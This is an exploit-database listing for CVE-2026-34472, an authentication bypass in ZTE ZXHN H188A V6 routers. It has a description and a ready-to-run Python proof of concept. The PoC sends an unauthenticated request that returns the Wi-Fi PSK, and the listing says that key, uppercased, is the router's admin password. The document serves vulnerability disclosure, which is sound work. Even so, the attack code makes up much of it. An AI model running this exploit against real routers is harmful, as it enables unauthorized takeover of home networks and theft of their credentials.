Share
## https://sploitus.com/exploit?id=PACKETSTORM:221650
# Title: ZTE ZXHN H188A V6 - Authentication Bypass via Pre-Login Wizard
    Credential Leak
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2026-34472
    # Vendor: ZTE Corporation
    # Affected: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
    # Category: Remote / Webapps
    
    # Description:
    # Unauthenticated requests with _type parameter bypass the QuickSetupEnable
    # gate, exposing wizard handlers that return WLAN PSKs, SSIDs, PPPoE
    usernames.
    # Leaked Wi-Fi PSK == admin password after uppercasing = full auth bypass.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34472
    # Write-up:
    https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
    
    # PoC:
    import requests
    data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
    "PASSTYPE": "PSK"}
    params = {"_type": "loginData", "_tag": "login_entry"}
    r = requests.post("http://TARGET_IP/", params=params, data=data,
    timeout=10, verify=False)
    print(r.text[:2000])